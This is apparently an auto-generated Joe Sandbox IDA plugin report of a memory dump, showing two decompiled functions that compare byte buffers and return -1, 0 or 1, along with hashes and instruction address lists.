Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: d7016d3e2ca520223c26c90b27d4d552b037e8304c42e3509f45d8782091c3ca
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 74C173762152B30AEFAE463D857413FBEE16A916B131A079DF4F2CB1D9FE20D164CA10

Uniqueness

Uniqueness Score: -1.00%

Function 01020F78, Relevance: .3, Instructions: 341
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E01020F78(void* __edx, void* __esi) {
				signed int _t197;
				signed char _t198;
				signed char _t199;
				signed char _t200;
				signed char _t202;
				signed char _t203;
				signed int _t246;
				void* _t294;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t327;
				void* _t329;
				void* _t331;
				void* _t333;
				void* _t335;
				void* _t336;

				_t336 = __esi;
				_t294 = __edx;
				if( *((intOrPtr*)(__esi - 0x1f)) ==  *((intOrPtr*)(__edx - 0x1f))) {
					_t246 = 0;
					L14:
					if(_t246 != 0) {
						goto L1;
					}
					_t198 =  *(_t336 - 0x1b);
					if(_t198 ==  *(_t294 - 0x1b)) {
						_t246 = 0;
						L25:
						if(_t246 != 0) {
							goto L1;
						}
						_t199 =  *(_t336 - 0x17);
						if(_t199 ==  *(_t294 - 0x17)) {
							_t246 = 0;
							L36:
							if(_t246 != 0) {
								goto L1;
							}
							_t200 =  *(_t336 - 0x13);
							if(_t200 ==  *(_t294 - 0x13)) {
								_t246 = 0;
								L47:
								if(_t246 != 0) {
									goto L1;
								}
								if( *(_t336 - 0xf) ==  *(_t294 - 0xf)) {
									_t246 = 0;
									L58:
									if(_t246 != 0) {
										goto L1;
									}
									_t202 =  *(_t336 - 0xb);
									if(_t202 ==  *(_t294 - 0xb)) {
										_t246 = 0;
										L69:
										if(_t246 != 0) {
											goto L1;
										}
										_t203 =  *(_t336 - 7);
										if(_t203 ==  *(_t294 - 7)) {
											_t246 = 0;
											L80:
											if(_t246 != 0) {
												goto L1;
											}
											_t297 = ( *(_t336 - 3) & 0x000000ff) - ( *(_t294 - 3) & 0x000000ff);
											if(_t297 == 0) {
												L83:
												_t299 = ( *(_t336 - 2) & 0x000000ff) - ( *(_t294 - 2) & 0x000000ff);
												if(_t299 == 0) {
													L3:
													_t246 = ( *(_t336 - 1) & 0x000000ff) - ( *(_t294 - 1) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L1;
												}
												_t246 = (0 | _t299 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												} else {
													goto L3;
												}
											}
											_t246 = (0 | _t297 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L83;
										}
										_t301 = (_t203 & 0x000000ff) - ( *(_t294 - 7) & 0x000000ff);
										if(_t301 == 0) {
											L73:
											_t303 = ( *(_t336 - 6) & 0x000000ff) - ( *(_t294 - 6) & 0x000000ff);
											if(_t303 == 0) {
												L75:
												_t305 = ( *(_t336 - 5) & 0x000000ff) - ( *(_t294 - 5) & 0x000000ff);
												if(_t305 == 0) {
													L77:
													_t246 = ( *(_t336 - 4) & 0x000000ff) - ( *(_t294 - 4) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L80;
												}
												_t246 = (0 | _t305 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												}
												goto L77;
											}
											_t246 = (0 | _t303 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L75;
										}
										_t246 = (0 | _t301 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L73;
									}
									_t307 = (_t202 & 0x000000ff) - ( *(_t294 - 0xb) & 0x000000ff);
									if(_t307 == 0) {
										L62:
										_t309 = ( *(_t336 - 0xa) & 0x000000ff) - ( *(_t294 - 0xa) & 0x000000ff);
										if(_t309 == 0) {
											L64:
											_t311 = ( *(_t336 - 9) & 0x000000ff) - ( *(_t294 - 9) & 0x000000ff);
											if(_t311 == 0) {
												L66:
												_t246 = ( *(_t336 - 8) & 0x000000ff) - ( *(_t294 - 8) & 0x000000ff);
												if(_t246 != 0) {
													_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
												}
												goto L69;
											}
											_t246 = (0 | _t311 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L66;
										}
										_t246 = (0 | _t309 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L64;
									}
									_t246 = (0 | _t307 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L62;
								}
								_t313 = ( *(_t336 - 0xf) & 0x000000ff) - ( *(_t294 - 0xf) & 0x000000ff);
								if(_t313 == 0) {
									L51:
									_t315 = ( *(_t336 - 0xe) & 0x000000ff) - ( *(_t294 - 0xe) & 0x000000ff);
									if(_t315 == 0) {
										L53:
										_t317 = ( *(_t336 - 0xd) & 0x000000ff) - ( *(_t294 - 0xd) & 0x000000ff);
										if(_t317 == 0) {
											L55:
											_t246 = ( *(_t336 - 0xc) & 0x000000ff) - ( *(_t294 - 0xc) & 0x000000ff);
											if(_t246 != 0) {
												_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
											}
											goto L58;
										}
										_t246 = (0 | _t317 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L55;
									}
									_t246 = (0 | _t315 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L53;
								}
								_t246 = (0 | _t313 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L51;
							}
							_t319 = (_t200 & 0x000000ff) - ( *(_t294 - 0x13) & 0x000000ff);
							if(_t319 == 0) {
								L40:
								_t321 = ( *(_t336 - 0x12) & 0x000000ff) - ( *(_t294 - 0x12) & 0x000000ff);
								if(_t321 == 0) {
									L42:
									_t323 = ( *(_t336 - 0x11) & 0x000000ff) - ( *(_t294 - 0x11) & 0x000000ff);
									if(_t323 == 0) {
										L44:
										_t246 = ( *(_t336 - 0x10) & 0x000000ff) - ( *(_t294 - 0x10) & 0x000000ff);
										if(_t246 != 0) {
											_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
										}
										goto L47;
									}
									_t246 = (0 | _t323 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L44;
								}
								_t246 = (0 | _t321 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L42;
							}
							_t246 = (0 | _t319 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L40;
						}
						_t325 = (_t199 & 0x000000ff) - ( *(_t294 - 0x17) & 0x000000ff);
						if(_t325 == 0) {
							L29:
							_t327 = ( *(_t336 - 0x16) & 0x000000ff) - ( *(_t294 - 0x16) & 0x000000ff);
							if(_t327 == 0) {
								L31:
								_t329 = ( *(_t336 - 0x15) & 0x000000ff) - ( *(_t294 - 0x15) & 0x000000ff);
								if(_t329 == 0) {
									L33:
									_t246 = ( *(_t336 - 0x14) & 0x000000ff) - ( *(_t294 - 0x14) & 0x000000ff);
									if(_t246 != 0) {
										_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
									}
									goto L36;
								}
								_t246 = (0 | _t329 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L33;
							}
							_t246 = (0 | _t327 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L31;
						}
						_t246 = (0 | _t325 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L29;
					}
					_t331 = (_t198 & 0x000000ff) - ( *(_t294 - 0x1b) & 0x000000ff);
					if(_t331 == 0) {
						L18:
						_t333 = ( *(_t336 - 0x1a) & 0x000000ff) - ( *(_t294 - 0x1a) & 0x000000ff);
						if(_t333 == 0) {
							L20:
							_t335 = ( *(_t336 - 0x19) & 0x000000ff) - ( *(_t294 - 0x19) & 0x000000ff);
							if(_t335 == 0) {
								L22:
								_t246 = ( *(_t336 - 0x18) & 0x000000ff) - ( *(_t294 - 0x18) & 0x000000ff);
								if(_t246 != 0) {
									_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
								}
								goto L25;
							}
							_t246 = (0 | _t335 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L22;
						}
						_t246 = (0 | _t333 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L20;
					}
					_t246 = (0 | _t331 > 0x00000000) * 2 - 1;
					if(_t246 != 0) {
						goto L1;
					}
					goto L18;
				} else {
					__edi =  *(__esi - 0x1f) & 0x000000ff;
					__edi = ( *(__esi - 0x1f) & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
					if(__edi == 0) {
						L7:
						__edi =  *(__esi - 0x1e) & 0x000000ff;
						__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
						if(__edi == 0) {
							L9:
							__edi =  *(__esi - 0x1d) & 0x000000ff;
							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
							if(__edi == 0) {
								L11:
								__ecx =  *(__esi - 0x1c) & 0x000000ff;
								__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L14;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L11;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L9;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L7;
				}
				L1:
				_t197 = _t246;
				return _t197;
			}

0x01020f78
0x01020f78
0x01020f7e
0x01021006
0x01021008
0x0102100a
0x00000000
0x00000000
0x01021010
0x01021016
0x0102109d
0x0102109f
0x010210a1
0x00000000
0x00000000
0x010210a7
0x010210ad
0x01021134
0x01021136
0x01021138
0x00000000
0x00000000
0x0102113e
0x01021144
0x010211cb
0x010211cd
0x010211cf
0x00000000
0x00000000
0x010211db
0x01021263
0x01021265
0x01021267
0x00000000
0x00000000
0x0102126d
0x01021273
0x010212fa
0x010212fc
0x010212fe
0x00000000
0x00000000
0x01021304
0x0102130a
0x01021391
0x01021393
0x01021395
0x00000000
0x00000000
0x010213a3
0x010213a5
0x010213bd
0x010213c5
0x010213c7
0x01020b20
0x01020b28
0x01020b2a
0x01020b37
0x01020b37
0x00000000
0x01020b2a
0x010213d4
0x01020b1a
0x00000000
0x00000000
0x00000000
0x00000000
0x01020b1a
0x010213ae
0x010213b7
0x00000000
0x00000000
0x00000000
0x010213b7
0x01021317
0x01021319
0x01021331
0x01021339
0x0102133b
0x01021353
0x0102135b
0x0102135d
0x01021375
0x0102137d
0x0102137f
0x01021388
0x01021388
0x00000000
0x0102137f
0x01021366
0x0102136f
0x00000000
0x00000000
0x00000000
0x0102136f
0x01021344
0x0102134d
0x00000000
0x00000000
0x00000000
0x0102134d
0x01021322
0x0102132b
0x00000000
0x00000000
0x00000000
0x0102132b
0x01021280
0x01021282
0x0102129a
0x010212a2
0x010212a4
0x010212bc
0x010212c4
0x010212c6
0x010212de
0x010212e6
0x010212e8
0x010212f1
0x010212f1
0x00000000
0x010212e8
0x010212cf
0x010212d8
0x00000000
0x00000000
0x00000000
0x010212d8
0x010212ad
0x010212b6
0x00000000
0x00000000
0x00000000
0x010212b6
0x0102128b
0x01021294
0x00000000
0x00000000
0x00000000
0x01021294
0x010211e9
0x010211eb
0x01021203
0x0102120b
0x0102120d
0x01021225
0x0102122d
0x0102122f
0x01021247
0x0102124f
0x01021251
0x0102125a
0x0102125a
0x00000000
0x01021251
0x01021238
0x01021241
0x00000000
0x00000000
0x00000000
0x01021241
0x01021216
0x0102121f
0x00000000
0x00000000
0x00000000
0x0102121f
0x010211f4
0x010211fd
0x00000000
0x00000000
0x00000000
0x010211fd
0x01021151
0x01021153
0x0102116b
0x01021173
0x01021175
0x0102118d
0x01021195
0x01021197
0x010211af
0x010211b7
0x010211b9
0x010211c2
0x010211c2
0x00000000
0x010211b9
0x010211a0
0x010211a9
0x00000000
0x00000000
0x00000000
0x010211a9
0x0102117e
0x01021187
0x00000000
0x00000000
0x00000000
0x01021187
0x0102115c
0x01021165
0x00000000
0x00000000
0x00000000
0x01021165
0x010210ba
0x010210bc
0x010210d4
0x010210dc
0x010210de
0x010210f6
0x010210fe
0x01021100
0x01021118
0x01021120
0x01021122
0x0102112b
0x0102112b
0x00000000
0x01021122
0x01021109
0x01021112
0x00000000
0x00000000
0x00000000
0x01021112
0x010210e7
0x010210f0
0x00000000
0x00000000
0x00000000
0x010210f0
0x010210c5
0x010210ce
0x00000000
0x00000000
0x00000000
0x010210ce
0x01021023
0x01021025
0x0102103d
0x01021045
0x01021047
0x0102105f
0x01021067
0x01021069
0x01021081
0x01021089
0x0102108b
0x01021094
0x01021094
0x00000000
0x0102108b
0x01021072
0x0102107b
0x00000000
0x00000000
0x00000000
0x0102107b
0x01021050
0x01021059
0x00000000
0x00000000
0x00000000
0x01021059
0x0102102e
0x01021037
0x00000000
0x00000000
0x00000000
0x01020f84
0x01020f88
0x01020f8c
0x01020f8e
0x01020fa6
0x01020fa6
0x01020fae
0x01020fb0
0x01020fc8
0x01020fc8
0x01020fd0
0x01020fd2
0x01020fea
0x01020fea
0x01020ff2
0x01020ff4
0x01020ffd
0x01020ffd
0x00000000
0x01020ff4
0x01020fd8
0x01020fdb
0x01020fe4
0x00000000
0x00000000
0x00000000
0x01020fe4
0x01020fb6
0x01020fb9
0x01020fc2
0x00000000
0x00000000
0x00000000
0x01020fc2
0x01020f94
0x01020f97
0x01020fa0
0x00000000
0x00000000
0x00000000
0x01020fa0
0x01020706
0x01020706
0x010214f7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: a9fe44ca946fbe4f273df56d2eed5b4a48f13466ec8c0579c1eecf4c17f7bb0f
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: F8C166762151B30AEFAE463D857413FBEE26A926B131A07EDE4F2CB5D5FE20C124D610

Uniqueness

Uniqueness Score: -1.00%

Function 0102070E, Relevance: .3, Instructions: 331
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0102070E(void* __edx, void* __esi) {
				signed int _t184;
				signed char _t185;
				signed char _t186;
				signed char _t187;
				signed char _t188;
				signed char _t190;
				signed int _t231;
				void* _t275;
				void* _t278;
				void* _t280;
				void* _t282;
				void* _t284;
				void* _t286;
				void* _t288;
				void* _t290;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t313;

				_t313 = __esi;
				_t275 = __edx;
				if( *((intOrPtr*)(__esi - 0x1d)) ==  *((intOrPtr*)(__edx - 0x1d))) {
					_t231 = 0;
					L11:
					if(_t231 != 0) {
						goto L1;
					}
					_t185 =  *(_t313 - 0x19);
					if(_t185 ==  *(_t275 - 0x19)) {
						_t231 = 0;
						L22:
						if(_t231 != 0) {
							goto L1;
						}
						_t186 =  *(_t313 - 0x15);
						if(_t186 ==  *(_t275 - 0x15)) {
							_t231 = 0;
							L33:
							if(_t231 != 0) {
								goto L1;
							}
							_t187 =  *(_t313 - 0x11);
							if(_t187 ==  *(_t275 - 0x11)) {
								_t231 = 0;
								L44:
								if(_t231 != 0) {
									goto L1;
								}
								_t188 =  *(_t313 - 0xd);
								if(_t188 ==  *(_t275 - 0xd)) {
									_t231 = 0;
									L55:
									if(_t231 != 0) {
										goto L1;
									}
									if( *(_t313 - 9) ==  *(_t275 - 9)) {
										_t231 = 0;
										L66:
										if(_t231 != 0) {
											goto L1;
										}
										_t190 =  *(_t313 - 5);
										if(_t190 ==  *(_t275 - 5)) {
											_t231 = 0;
											L77:
											if(_t231 == 0) {
												_t231 = ( *(_t313 - 1) & 0x000000ff) - ( *(_t275 - 1) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
											}
											goto L1;
										}
										_t278 = (_t190 & 0x000000ff) - ( *(_t275 - 5) & 0x000000ff);
										if(_t278 == 0) {
											L70:
											_t280 = ( *(_t313 - 4) & 0x000000ff) - ( *(_t275 - 4) & 0x000000ff);
											if(_t280 == 0) {
												L72:
												_t282 = ( *(_t313 - 3) & 0x000000ff) - ( *(_t275 - 3) & 0x000000ff);
												if(_t282 == 0) {
													L74:
													_t231 = ( *(_t313 - 2) & 0x000000ff) - ( *(_t275 - 2) & 0x000000ff);
													if(_t231 != 0) {
														_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
													}
													goto L77;
												}
												_t231 = (0 | _t282 > 0x00000000) * 2 - 1;
												if(_t231 != 0) {
													goto L1;
												}
												goto L74;
											}
											_t231 = (0 | _t280 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L72;
										}
										_t231 = (0 | _t278 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L70;
									}
									_t284 = ( *(_t313 - 9) & 0x000000ff) - ( *(_t275 - 9) & 0x000000ff);
									if(_t284 == 0) {
										L59:
										_t286 = ( *(_t313 - 8) & 0x000000ff) - ( *(_t275 - 8) & 0x000000ff);
										if(_t286 == 0) {
											L61:
											_t288 = ( *(_t313 - 7) & 0x000000ff) - ( *(_t275 - 7) & 0x000000ff);
											if(_t288 == 0) {
												L63:
												_t231 = ( *(_t313 - 6) & 0x000000ff) - ( *(_t275 - 6) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
												goto L66;
											}
											_t231 = (0 | _t288 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t231 = (0 | _t286 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t231 = (0 | _t284 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t290 = (_t188 & 0x000000ff) - ( *(_t275 - 0xd) & 0x000000ff);
								if(_t290 == 0) {
									L48:
									_t292 = ( *(_t313 - 0xc) & 0x000000ff) - ( *(_t275 - 0xc) & 0x000000ff);
									if(_t292 == 0) {
										L50:
										_t294 = ( *(_t313 - 0xb) & 0x000000ff) - ( *(_t275 - 0xb) & 0x000000ff);
										if(_t294 == 0) {
											L52:
											_t231 = ( *(_t313 - 0xa) & 0x000000ff) - ( *(_t275 - 0xa) & 0x000000ff);
											if(_t231 != 0) {
												_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
											}
											goto L55;
										}
										_t231 = (0 | _t294 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t231 = (0 | _t292 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t231 = (0 | _t290 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t296 = (_t187 & 0x000000ff) - ( *(_t275 - 0x11) & 0x000000ff);
							if(_t296 == 0) {
								L37:
								_t298 = ( *(_t313 - 0x10) & 0x000000ff) - ( *(_t275 - 0x10) & 0x000000ff);
								if(_t298 == 0) {
									L39:
									_t300 = ( *(_t313 - 0xf) & 0x000000ff) - ( *(_t275 - 0xf) & 0x000000ff);
									if(_t300 == 0) {
										L41:
										_t231 = ( *(_t313 - 0xe) & 0x000000ff) - ( *(_t275 - 0xe) & 0x000000ff);
										if(_t231 != 0) {
											_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
										}
										goto L44;
									}
									_t231 = (0 | _t300 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t231 = (0 | _t298 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t231 = (0 | _t296 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t302 = (_t186 & 0x000000ff) - ( *(_t275 - 0x15) & 0x000000ff);
						if(_t302 == 0) {
							L26:
							_t304 = ( *(_t313 - 0x14) & 0x000000ff) - ( *(_t275 - 0x14) & 0x000000ff);
							if(_t304 == 0) {
								L28:
								_t306 = ( *(_t313 - 0x13) & 0x000000ff) - ( *(_t275 - 0x13) & 0x000000ff);
								if(_t306 == 0) {
									L30:
									_t231 = ( *(_t313 - 0x12) & 0x000000ff) - ( *(_t275 - 0x12) & 0x000000ff);
									if(_t231 != 0) {
										_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
									}
									goto L33;
								}
								_t231 = (0 | _t306 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t231 = (0 | _t304 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t231 = (0 | _t302 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t308 = (_t185 & 0x000000ff) - ( *(_t275 - 0x19) & 0x000000ff);
					if(_t308 == 0) {
						L15:
						_t310 = ( *(_t313 - 0x18) & 0x000000ff) - ( *(_t275 - 0x18) & 0x000000ff);
						if(_t310 == 0) {
							L17:
							_t312 = ( *(_t313 - 0x17) & 0x000000ff) - ( *(_t275 - 0x17) & 0x000000ff);
							if(_t312 == 0) {
								L19:
								_t231 = ( *(_t313 - 0x16) & 0x000000ff) - ( *(_t275 - 0x16) & 0x000000ff);
								if(_t231 != 0) {
									_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
								}
								goto L22;
							}
							_t231 = (0 | _t312 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t231 = (0 | _t310 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t231 = (0 | _t308 > 0x00000000) * 2 - 1;
					if(_t231 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
					if(__edi == 0) {
						L4:
						__edi =  *(__esi - 0x1c) & 0x000000ff;
						__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
						if(__edi == 0) {
							L6:
							__edi =  *(__esi - 0x1b) & 0x000000ff;
							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
							if(__edi == 0) {
								L8:
								__ecx =  *(__esi - 0x1a) & 0x000000ff;
								__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L11;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L8;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L6;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t184 = _t231;
				return _t184;
			}

0x0102070e
0x0102070e
0x01020714
0x0102078b
0x0102078d
0x0102078f
0x00000000
0x00000000
0x01020795
0x0102079b
0x01020822
0x01020824
0x01020826
0x00000000
0x00000000
0x0102082c
0x01020832
0x010208b9
0x010208bb
0x010208bd
0x00000000
0x00000000
0x010208c3
0x010208c9
0x01020950
0x01020952
0x01020954
0x00000000
0x00000000
0x0102095a
0x01020960
0x010209e7
0x010209e9
0x010209eb
0x00000000
0x00000000
0x010209f7
0x01020a7f
0x01020a81
0x01020a83
0x00000000
0x00000000
0x01020a89
0x01020a8f
0x01020b16
0x01020b18
0x01020b1a
0x01020b28
0x01020b2a
0x01020b37
0x01020b37
0x01020b2a
0x00000000
0x01020b1a
0x01020a9c
0x01020a9e
0x01020ab6
0x01020abe
0x01020ac0
0x01020ad8
0x01020ae0
0x01020ae2
0x01020afa
0x01020b02
0x01020b04
0x01020b0d
0x01020b0d
0x00000000
0x01020b04
0x01020aeb
0x01020af4
0x00000000
0x00000000
0x00000000
0x01020af4
0x01020ac9
0x01020ad2
0x00000000
0x00000000
0x00000000
0x01020ad2
0x01020aa7
0x01020ab0
0x00000000
0x00000000
0x00000000
0x01020ab0
0x01020a05
0x01020a07
0x01020a1f
0x01020a27
0x01020a29
0x01020a41
0x01020a49
0x01020a4b
0x01020a63
0x01020a6b
0x01020a6d
0x01020a76
0x01020a76
0x00000000
0x01020a6d
0x01020a54
0x01020a5d
0x00000000
0x00000000
0x00000000
0x01020a5d
0x01020a32
0x01020a3b
0x00000000
0x00000000
0x00000000
0x01020a3b
0x01020a10
0x01020a19
0x00000000
0x00000000
0x00000000
0x01020a19
0x0102096d
0x0102096f
0x01020987
0x0102098f
0x01020991
0x010209a9
0x010209b1
0x010209b3
0x010209cb
0x010209d3
0x010209d5
0x010209de
0x010209de
0x00000000
0x010209d5
0x010209bc
0x010209c5
0x00000000
0x00000000
0x00000000
0x010209c5
0x0102099a
0x010209a3
0x00000000
0x00000000
0x00000000
0x010209a3
0x01020978
0x01020981
0x00000000
0x00000000
0x00000000
0x01020981
0x010208d6
0x010208d8
0x010208f0
0x010208f8
0x010208fa
0x01020912
0x0102091a
0x0102091c
0x01020934
0x0102093c
0x0102093e
0x01020947
0x01020947
0x00000000
0x0102093e
0x01020925
0x0102092e
0x00000000
0x00000000
0x00000000
0x0102092e
0x01020903
0x0102090c
0x00000000
0x00000000
0x00000000
0x0102090c
0x010208e1
0x010208ea
0x00000000
0x00000000
0x00000000
0x010208ea
0x0102083f
0x01020841
0x01020859
0x01020861
0x01020863
0x0102087b
0x01020883
0x01020885
0x0102089d
0x010208a5
0x010208a7
0x010208b0
0x010208b0
0x00000000
0x010208a7
0x0102088e
0x01020897
0x00000000
0x00000000
0x00000000
0x01020897
0x0102086c
0x01020875
0x00000000
0x00000000
0x00000000
0x01020875
0x0102084a
0x01020853
0x00000000
0x00000000
0x00000000
0x01020853
0x010207a8
0x010207aa
0x010207c2
0x010207ca
0x010207cc
0x010207e4
0x010207ec
0x010207ee
0x01020806
0x0102080e
0x01020810
0x01020819
0x01020819
0x00000000
0x01020810
0x010207f7
0x01020800
0x00000000
0x00000000
0x00000000
0x01020800
0x010207d5
0x010207de
0x00000000
0x00000000
0x00000000
0x010207de
0x010207b3
0x010207bc
0x00000000
0x00000000
0x00000000
0x01020716
0x01020716
0x0102071d
0x0102071f
0x01020733
0x01020733
0x0102073b
0x0102073d
0x01020751
0x01020751
0x01020759
0x0102075b
0x0102076f
0x0102076f
0x01020777
0x01020779
0x01020782
0x01020782
0x00000000
0x01020779
0x01020761
0x01020764
0x0102076d
0x00000000
0x00000000
0x00000000
0x0102076d
0x01020743
0x01020746
0x0102074f
0x00000000
0x00000000
0x00000000
0x0102074f
0x01020725
0x01020728
0x01020731
0x00000000
0x00000000
0x00000000
0x01020731
0x01020706
0x01020706
0x010214f7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

